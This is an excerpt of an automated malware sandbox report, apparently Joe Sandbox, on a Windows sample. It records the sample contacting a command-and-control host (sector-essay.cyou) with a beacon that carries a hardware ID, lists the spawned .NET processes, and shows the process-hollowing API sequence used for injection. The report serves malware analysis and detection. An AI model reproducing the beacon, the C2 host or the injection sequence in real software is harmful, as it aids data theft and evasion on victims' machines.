                        Set-Cookie: PHPSESSID=cngl21c7fnpkacsa3v4cri2g81; expires=Thu, 20-Mar-2025 01:22:32 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SVSvdxOZXsOOJG9QN%2BVRoVxLsuKQiZDx%2BkTDNHlKhdMuseOJwN9UrgrXieogOM5jGddNOmNgORW6ET6vI0LCMlgADklkWnbnl0vquRYSRkINgEJMNDoWWA01B5ZeJq%2BWE5mWGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8e77b986cd9843b5-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1730&sent=202&recv=593&lost=0&retrans=0&sent_bytes=2843&recv_bytes=571961&delivery_rate=1650650&cwnd=225&unsent_bytes=0&cid=db38436929f534cb&ts=2353&x=0"


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.549722104.21.47.1364436392C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        2024-11-24 07:35:55 UTC265OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 87
                        Host: sector-essay.cyou
                        2024-11-24 07:35:55 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 26 6a 3d 26 68 77 69 64 3d 35 36 39 37 45 44 37 42 33 41 37 35 38 37 31 37 46 45 45 38 31 35 45 42 34 30 33 46 35 44 35 34
                        Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6928154717&j=&hwid=5697ED7B3A758717FEE815EB403F5D54
                        2024-11-24 07:35:56 UTC1013INHTTP/1.1 200 OK
                        Date: Sun, 24 Nov 2024 07:35:56 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=22chn6rhparhammscg5vlg7k35; expires=Thu, 20-Mar-2025 01:22:35 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V5Xr3BkrtnphsjFZzUcQxZ0tjbsqOmAQFT1Ea2bQQGe9Ux%2BEJEfMnRyuVH9EBCskQ95midNINxF3StXG2FOrEnJkLWlMMyDdLCgiE12SuYRRbwfkTb%2BZp87NAF6B80mTTnP1uQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8e77b99e0d1319b2-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1782&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=988&delivery_rate=1588683&cwnd=149&unsent_bytes=0&cid=b1ae0f353bf314f6&ts=732&x=0"
                        2024-11-24 07:35:56 UTC54INData Raw: 33 30 0d 0a 75 35 35 55 54 74 5a 76 30 57 30 51 4a 5a 72 36 73 6b 36 73 54 70 44 77 72 36 4f 65 75 44 42 47 51 42 2b 47 73 66 38 75 45 30 50 67 77 77 3d 3d 0d 0a
                        Data Ascii: 30u55UTtZv0W0QJZr6sk6sTpDwr6OeuDBGQB+Gsf8uE0Pgww==
                        2024-11-24 07:35:56 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:02:35:32
                        Start date:24/11/2024
                        Path:C:\Users\user\Desktop\ZjH6H6xqo7.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\ZjH6H6xqo7.exe"
                        Imagebase:0xae0000
                        File size:44'544 bytes
                        MD5 hash:16A1FBD21AF85D43B1AC31BF1829A152
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:2
                        Start time:02:35:35
                        Start date:24/11/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline"
                        Imagebase:0xc00000
                        File size:2'141'552 bytes
                        MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:3
                        Start time:02:35:35
                        Start date:24/11/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:4
                        Start time:02:35:35
                        Start date:24/11/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6781.tmp" "c:\Users\user\AppData\Local\Temp\up5gphgh\CSCE347F25DAC914FE0BD5774A121A2513C.TMP"
                        Imagebase:0xb60000
                        File size:46'832 bytes
                        MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:5
                        Start time:02:35:35
                        Start date:24/11/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                        Imagebase:0xe60000
                        File size:65'440 bytes
                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:16.9%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:111
                          Total number of Limit Nodes:0
                          execution_graph 2298 1572bf1 2299 1572bbe 2298->2299 2327 1572805 2299->2327 2331 1572810 2299->2331 2300 1572c75 2308 1572edf 2300->2308 2317 15723f0 Wow64SetThreadContext 2300->2317 2318 15723e8 Wow64SetThreadContext 2300->2318 2301 1572cdf 2301->2308 2321 1572670 ReadProcessMemory 2301->2321 2322 1572678 ReadProcessMemory 2301->2322 2302 1572d24 2302->2308 2315 15724c1 VirtualAllocEx 2302->2315 2316 15724c8 VirtualAllocEx 2302->2316 2303 1572d87 2303->2308 2319 1572581 WriteProcessMemory 2303->2319 2320 1572588 WriteProcessMemory 2303->2320 2304 1572e57 2313 1572581 WriteProcessMemory 2304->2313 2314 1572588 WriteProcessMemory 2304->2314 2305 1572dae 2305->2304 2305->2308 2311 1572581 WriteProcessMemory 2305->2311 2312 1572588 WriteProcessMemory 2305->2312 2306 1572e80 2306->2308 2323 15723f0 Wow64SetThreadContext 2306->2323 2324 15723e8 Wow64SetThreadContext 2306->2324 2307 1572eca 2307->2308 2309 1572340 ResumeThread 2307->2309 2310 1572339 ResumeThread 2307->2310 2309->2308 2310->2308 2311->2305 2312->2305 2313->2306 2314->2306 2315->2303 2316->2303 2317->2301 2318->2301 2319->2305 2320->2305 2321->2302 2322->2302 2323->2307 2324->2307 2328 1572899 CreateProcessA 2327->2328 2330 1572a5b 2328->2330 2332 1572899 CreateProcessA 2331->2332 2334 1572a5b 2332->2334 2335 1572bdc 2336 1572bbe 2335->2336 2346 1572805 CreateProcessA 2336->2346 2347 1572810 CreateProcessA 2336->2347 2337 1572c75 2345 1572edf 2337->2345 2364 15723f0 2337->2364 2368 15723e8 2337->2368 2338 1572cdf 2338->2345 2372 1572678 2338->2372 2376 1572670 2338->2376 2339 1572d24 2339->2345 2380 15724c1 2339->2380 2384 15724c8 2339->2384 2340 1572d87 2340->2345 2388 1572581 2340->2388 2392 1572588 2340->2392 2341 1572e57 2352 1572581 WriteProcessMemory 2341->2352 2353 1572588 WriteProcessMemory 2341->2353 2342 1572dae 2342->2341 2342->2345 2350 1572581 WriteProcessMemory 2342->2350 2351 1572588 WriteProcessMemory 2342->2351 2343 1572e80 2343->2345 2362 15723f0 Wow64SetThreadContext 2343->2362 2363 15723e8 Wow64SetThreadContext 2343->2363 2344 1572eca 2344->2345 2396 1572340 2344->2396 2400 1572339 2344->2400 2346->2337 2347->2337 2350->2342 2351->2342 2352->2343 2353->2343 2362->2344 2363->2344 2365 1572435 Wow64SetThreadContext 2364->2365 2367 157247d 2365->2367 2367->2338 2369 1572435 Wow64SetThreadContext 2368->2369 2371 157247d 2369->2371 2371->2338 2373 15726c3 ReadProcessMemory 2372->2373 2375 1572707 2373->2375 2375->2339 2377 15726c3 ReadProcessMemory 2376->2377 2379 1572707 2377->2379 2379->2339 2381 1572508 VirtualAllocEx 2380->2381 2383 1572545 2381->2383 2383->2340 2385 1572508 VirtualAllocEx 2384->2385 2387 1572545 2385->2387 2387->2340 2389 15725d0 WriteProcessMemory 2388->2389 2391 1572627 2389->2391 2391->2342 2393 15725d0 WriteProcessMemory 2392->2393 2395 1572627 2393->2395 2395->2342 2397 1572380 ResumeThread 2396->2397 2399 15723b1 2397->2399 2399->2345 2401 1572380 ResumeThread 2400->2401 2403 15723b1 2401->2403 2403->2345 2491 1572b88 2492 1572bbe 2491->2492 2518 1572805 CreateProcessA 2492->2518 2519 1572810 CreateProcessA 2492->2519 2493 1572c75 2501 1572edf 2493->2501 2510 15723f0 Wow64SetThreadContext 2493->2510 2511 15723e8 Wow64SetThreadContext 2493->2511 2494 1572cdf 2494->2501 2514 1572670 ReadProcessMemory 2494->2514 2515 1572678 ReadProcessMemory 2494->2515 2495 1572d24 2495->2501 2508 15724c1 VirtualAllocEx 2495->2508 2509 15724c8 VirtualAllocEx 2495->2509 2496 1572d87 2496->2501 2512 1572581 WriteProcessMemory 2496->2512 2513 1572588 WriteProcessMemory 2496->2513 2497 1572e57 2506 1572581 WriteProcessMemory 2497->2506 2507 1572588 WriteProcessMemory 2497->2507 2498 1572dae 2498->2497 2498->2501 2504 1572581 WriteProcessMemory 2498->2504 2505 1572588 WriteProcessMemory 2498->2505 2499 1572e80 2499->2501 2516 15723f0 Wow64SetThreadContext 2499->2516 2517 15723e8 Wow64SetThreadContext 2499->2517 2500 1572eca 2500->2501 2502 1572340 ResumeThread 2500->2502 2503 1572339 ResumeThread 2500->2503 2502->2501 2503->2501 2504->2498 2505->2498 2506->2499 2507->2499 2508->2496 2509->2496 2510->2494 2511->2494 2512->2498 2513->2498 2514->2495 2515->2495 2516->2500 2517->2500 2518->2493 2519->2493

                          Executed Functions

                          Function 01572805 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 1572805-15728a5 2 15728a7-15728b1 0->2 3 15728de-15728fe 0->3 2->3 4 15728b3-15728b5 2->4 8 1572937-1572966 3->8 9 1572900-157290a 3->9 6 15728b7-15728c1 4->6 7 15728d8-15728db 4->7 10 15728c5-15728d4 6->10 11 15728c3 6->11 7->3 19 157299f-1572a59 CreateProcessA 8->19 20 1572968-1572972 8->20 9->8 12 157290c-157290e 9->12 10->10 13 15728d6 10->13 11->10 14 1572931-1572934 12->14 15 1572910-157291a 12->15 13->7 14->8 17 157291e-157292d 15->17 18 157291c 15->18 17->17 21 157292f 17->21 18->17 31 1572a62-1572ae8 19->31 32 1572a5b-1572a61 19->32 20->19 22 1572974-1572976 20->22 21->14 24 1572999-157299c 22->24 25 1572978-1572982 22->25 24->19 26 1572986-1572995 25->26 27 1572984 25->27 26->26 28 1572997 26->28 27->26 28->24 42 1572aea-1572aee 31->42 43 1572af8-1572afc 31->43 32->31 42->43 46 1572af0-1572af3 call 1570b04 42->46 44 1572afe-1572b02 43->44 45 1572b0c-1572b10 43->45 44->45 47 1572b04-1572b07 call 1570b04 44->47 48 1572b12-1572b16 45->48 49 1572b20-1572b24 45->49 46->43 47->45 48->49 52 1572b18-1572b1b call 1570b04 48->52 53 1572b36-1572b3d 49->53 54 1572b26-1572b2c 49->54 52->49 56 1572b54 53->56 57 1572b3f-1572b4e 53->57 54->53 58 1572b55 56->58 57->56 58->58
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01572A46
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 6efbce66c035facf31f3205772b2cfa692420a56c864e9830918d1597dda55e5
                          • Instruction ID: ec7c7c04bdf8e57d679649265ec3c5d8e8ecd9baadea5c64cd6d8d4cb7dfb606
                          • Opcode Fuzzy Hash: 6efbce66c035facf31f3205772b2cfa692420a56c864e9830918d1597dda55e5
                          • Instruction Fuzzy Hash: 81A17E71D00219CFDB25DF69D8417EDBBB2BF48314F14856AE818AB280DB749985CF91
                          Function 01572810 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 60 1572810-15728a5 62 15728a7-15728b1 60->62 63 15728de-15728fe 60->63 62->63 64 15728b3-15728b5 62->64 68 1572937-1572966 63->68 69 1572900-157290a 63->69 66 15728b7-15728c1 64->66 67 15728d8-15728db 64->67 70 15728c5-15728d4 66->70 71 15728c3 66->71 67->63 79 157299f-1572a59 CreateProcessA 68->79 80 1572968-1572972 68->80 69->68 72 157290c-157290e 69->72 70->70 73 15728d6 70->73 71->70 74 1572931-1572934 72->74 75 1572910-157291a 72->75 73->67 74->68 77 157291e-157292d 75->77 78 157291c 75->78 77->77 81 157292f 77->81 78->77 91 1572a62-1572ae8 79->91 92 1572a5b-1572a61 79->92 80->79 82 1572974-1572976 80->82 81->74 84 1572999-157299c 82->84 85 1572978-1572982 82->85 84->79 86 1572986-1572995 85->86 87 1572984 85->87 86->86 88 1572997 86->88 87->86 88->84 102 1572aea-1572aee 91->102 103 1572af8-1572afc 91->103 92->91 102->103 106 1572af0-1572af3 call 1570b04 102->106 104 1572afe-1572b02 103->104 105 1572b0c-1572b10 103->105 104->105 107 1572b04-1572b07 call 1570b04 104->107 108 1572b12-1572b16 105->108 109 1572b20-1572b24 105->109 106->103 107->105 108->109 112 1572b18-1572b1b call 1570b04 108->112 113 1572b36-1572b3d 109->113 114 1572b26-1572b2c 109->114 112->109 116 1572b54 113->116 117 1572b3f-1572b4e 113->117 114->113 118 1572b55 116->118 117->116 118->118
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01572A46
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 7cdca0e1871e52f384acb20117d96d68ecd4844e25b08442614d48dd9e721525
                          • Instruction ID: 280f4a2ea2e5390b3e41f3dd2a28cb19c91409d9786168d4ef9ee00bae79a55f
                          • Opcode Fuzzy Hash: 7cdca0e1871e52f384acb20117d96d68ecd4844e25b08442614d48dd9e721525
                          • Instruction Fuzzy Hash: 38917D71D00219CFEB25DF69D841BEDBBB2BF48314F14856AE818AB280DB749985CF91
                          Function 01572581 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 120 1572581-15725d6 122 15725e6-1572625 WriteProcessMemory 120->122 123 15725d8-15725e4 120->123 125 1572627-157262d 122->125 126 157262e-157265e 122->126 123->122 125->126
                          APIs
                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01572618
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: c3916b6c750b10566ea9fb61a28b2cfc146b22a38addca504583b6e3f7fc6f63
                          • Instruction ID: 1d099eda8dcaac23ca8fd46fad520e548b21ff0a1dc21379bb7ace44ea0d80ce
                          • Opcode Fuzzy Hash: c3916b6c750b10566ea9fb61a28b2cfc146b22a38addca504583b6e3f7fc6f63
                          • Instruction Fuzzy Hash: F02126B5D103499FDB10DFA9C985BEEBBF5FF88310F10842AE919A7250D7789944CBA0
                          Function 01572588 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 130 1572588-15725d6 132 15725e6-1572625 WriteProcessMemory 130->132 133 15725d8-15725e4 130->133 135 1572627-157262d 132->135 136 157262e-157265e 132->136 133->132 135->136
                          APIs
                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01572618
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: c58126a648accce2831734a5918cadf585cef107b123caeeb54a01cef6e5452d
                          • Instruction ID: 75113a9aa4b42ff5b2f36924d3294e13d98f2bf544e672d1173ca0542e6a9336
                          • Opcode Fuzzy Hash: c58126a648accce2831734a5918cadf585cef107b123caeeb54a01cef6e5452d
                          • Instruction Fuzzy Hash: 8D211B75D003499FDB10DFA9C945BDEBBF5FF48310F10842AE519A7240D7789944CBA5
                          Function 01572670 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 140 1572670-1572705 ReadProcessMemory 143 1572707-157270d 140->143 144 157270e-157273e 140->144 143->144
                          APIs
                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 015726F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 1a65a17e8a4c06de91ed6cd4d27ac4802bf3dac7b734b7e236ab9586105a40a6
                          • Instruction ID: 64ecddd8a566689a16af7af6977e094aed8c850bae0cd43daa7995b8e24dca8e
                          • Opcode Fuzzy Hash: 1a65a17e8a4c06de91ed6cd4d27ac4802bf3dac7b734b7e236ab9586105a40a6
                          • Instruction Fuzzy Hash: 202124B1C003499FCB10CFA9C885AEEBBF5FF88310F10882EE519A7250C7389941CBA1
                          Function 015723E8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 148 15723e8-157243b 150 157243d-1572449 148->150 151 157244b-157247b Wow64SetThreadContext 148->151 150->151 153 1572484-15724b4 151->153 154 157247d-1572483 151->154 154->153
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0157246E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: d36ffb0cfa68c1bb295c9705e994b1871f87a4804da05feb57372bf02eed5ab4
                          • Instruction ID: 5e0d0871f992ad9f74dacf0dab9c7876a25f6051497bfb9d3d1eeeb0e8c524ba
                          • Opcode Fuzzy Hash: d36ffb0cfa68c1bb295c9705e994b1871f87a4804da05feb57372bf02eed5ab4
                          • Instruction Fuzzy Hash: AE2100B1D002098FDB14DFAAC485BEEBBF5EF89324F10842AD559A7240DB789945CBA1
                          Function 015723F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 158 15723f0-157243b 160 157243d-1572449 158->160 161 157244b-157247b Wow64SetThreadContext 158->161 160->161 163 1572484-15724b4 161->163 164 157247d-1572483 161->164 164->163
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0157246E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 881ca8affd10d1323463eae007032877336d9368de574b848d3d5ca440cd1eaf
                          • Instruction ID: ee22af16f6cf79792771036364adbd6752036b1992775af80d80730c8de44593
                          • Opcode Fuzzy Hash: 881ca8affd10d1323463eae007032877336d9368de574b848d3d5ca440cd1eaf
                          • Instruction Fuzzy Hash: 9B2115B1D002098FDB14DFAAC485BEEBBF5FF88314F14842AD559A7240DB78A945CFA1
                          Function 01572678 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 168 1572678-1572705 ReadProcessMemory 171 1572707-157270d 168->171 172 157270e-157273e 168->172 171->172
                          APIs
                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 015726F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 91bdf457b1ddcc68c4a9e752617bc296d1e272e3dcf3212409016b60c3cb9598
                          • Instruction ID: 65ee72949be66ee14c48c9b2f8a220d815de1d7f6165eecafa144a6ffdfe454d
                          • Opcode Fuzzy Hash: 91bdf457b1ddcc68c4a9e752617bc296d1e272e3dcf3212409016b60c3cb9598
                          • Instruction Fuzzy Hash: BC2138B1C003499FDB10DFAAC981AEEFBF5FF48310F10842AE519A7240C7789944CBA1
                          Function 015724C1 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 176 15724c1-1572543 VirtualAllocEx 179 1572545-157254b 176->179 180 157254c-1572571 176->180 179->180
                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01572536
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 89d86cbfca2eca573d4c7bd5e5c6c1396e1de670a741f1cbfb8e37bb8168359d
                          • Instruction ID: db2224eddb0d2ff1d134e7f7e97a413bea2f09b03fb09ca9814d8bfea939e8bf
                          • Opcode Fuzzy Hash: 89d86cbfca2eca573d4c7bd5e5c6c1396e1de670a741f1cbfb8e37bb8168359d
                          • Instruction Fuzzy Hash: C7112672C002499FCB14DFA9D845AEEBFF5FF88314F24881AE519AB250C7799944CFA0
                          Function 015724C8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 184 15724c8-1572543 VirtualAllocEx 187 1572545-157254b 184->187 188 157254c-1572571 184->188 187->188
                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01572536
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: d24e17269f618b9af028437490823ea24b5d35dddf9d9eac8b35751a93d8a6b4
                          • Instruction ID: 170ad60d75903820b3b505cfb7920225c2714ca9e3fe51154029ae94f2c5d0db
                          • Opcode Fuzzy Hash: d24e17269f618b9af028437490823ea24b5d35dddf9d9eac8b35751a93d8a6b4
                          • Instruction Fuzzy Hash: F41137718002499FCB10DFAAD845AEEFFF5FF88310F108819E519A7250C779A940CFA1
                          Function 01572339 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 192 1572339-15723af ResumeThread 195 15723b1-15723b7 192->195 196 15723b8-15723dd 192->196 195->196
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: f62d3a096ac99345972c3b5a48771188d96fbba8346e9defd34958d8d14da3ae
                          • Instruction ID: 1f7c55bcf22ee1a92732b91ef0ea23bdbef87f3051d1ad22e4b0d3f8fefc5de8
                          • Opcode Fuzzy Hash: f62d3a096ac99345972c3b5a48771188d96fbba8346e9defd34958d8d14da3ae
                          • Instruction Fuzzy Hash: 1C1128B1D003488FDB14DFAAD5457EEFBF5EF88324F20882AD519A7250C7799944CBA1
                          Function 01572340 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 200 1572340-15723af ResumeThread 203 15723b1-15723b7 200->203 204 15723b8-15723dd 200->204 203->204
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 94b4d318a0119b87900cd9330563cf65f9f1bf09f7cdb1c0ef717b55f85dcf52
                          • Instruction ID: 67d863dd7591eaac5f390cf007069ba652629a89c0dd92843fda5ec49deda8ce
                          • Opcode Fuzzy Hash: 94b4d318a0119b87900cd9330563cf65f9f1bf09f7cdb1c0ef717b55f85dcf52
                          • Instruction Fuzzy Hash: DC113AB1D003488FDB14DFAAC4457EEFBF5EF88314F208419D519A7240CB79A944CBA1

                          Execution Graph

                          Execution Coverage:8.8%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:66.8%
                          Total number of Nodes:238
                          Total number of Limit Nodes:19
